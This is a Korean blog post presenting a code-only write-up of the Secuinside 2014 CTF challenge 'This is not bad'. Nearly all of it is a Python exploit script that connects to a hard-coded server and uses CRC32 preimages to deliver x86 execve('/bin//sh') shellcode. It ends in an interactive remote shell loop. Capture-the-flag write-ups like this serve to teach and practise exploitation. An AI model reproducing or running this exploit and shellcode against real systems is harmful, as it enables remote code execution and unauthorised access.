카테고리 없음

Secuinside 2014 "This is not bad" write-up (code only)

진모씨 2014. 6. 15. 12:17

Description:

CRC32 preimage attack (with x86 execve shellcode!)


sc.tar


from binascii import crc32

from socket import *

from struct import *

mysocket = socket(AF_INET, SOCK_STREAM)

mysocket.connect(("54.178.232.195",5757))

payload = []

d = mysocket.recv(1024)

salt = d[6:-1].decode('hex')

org_crc = crc32(salt)

offset = 0

v_crc_table = [0] * 256

for i in range(256):

 v_crc_table[(crc32(chr(i), 0) & 0xffffffff) >> 24] = (crc32(chr(i), 0) & 0xffffffff)

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69""\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90"

for offset in range(0, len(shellcode), 4):

    r=''

    old_crc = org_crc

    s = shellcode[offset:offset+4]

    a = []

    c = ord(s[-1])

    d = v_crc_table[c]

    a.append(d & 0xffffffff)

    for i in range(2,5):

        c = ord(s[-i])

        s_c = c

        ss = 0x00ff0000

        for j, cc in enumerate(a[::-1]):

            s_c ^= (cc & (ss >> (j * 8)) ) >> (16-j*8)

        a.append(v_crc_table[s_c] & 0xffffffff)

        print list(enumerate(a[::-1]))

    print a

    print "\n".join(map(lambda x:hex(x)[2:].zfill(8),a))

    print '================='

    print a

    for j in range(4):

        for i in range(256):

            if (crc32(chr(i), old_crc) & 0xffffffff) >> 24 == (a[-j-1] >> 24):

                r+=chr(i)

                break

        old_crc = crc32(chr(i), old_crc) & 0xffffffff

    print r.encode('hex')

    payload.append(r)

print pack("I", len(payload)).encode("hex") + ''.join(map(lambda a: a.encode("hex"), payload))

print map(hex, map(lambda x: x & 0xffffffff, map(lambda x: crc32(salt+x), payload)))

mysocket.send(pack("I", len(payload)))

for string in payload:

    mysocket.send(pack("I", len(string)) + string)

while True:

    mysocket.send(raw_input("$ ")+"\n")

    print mysocket.recv(1024)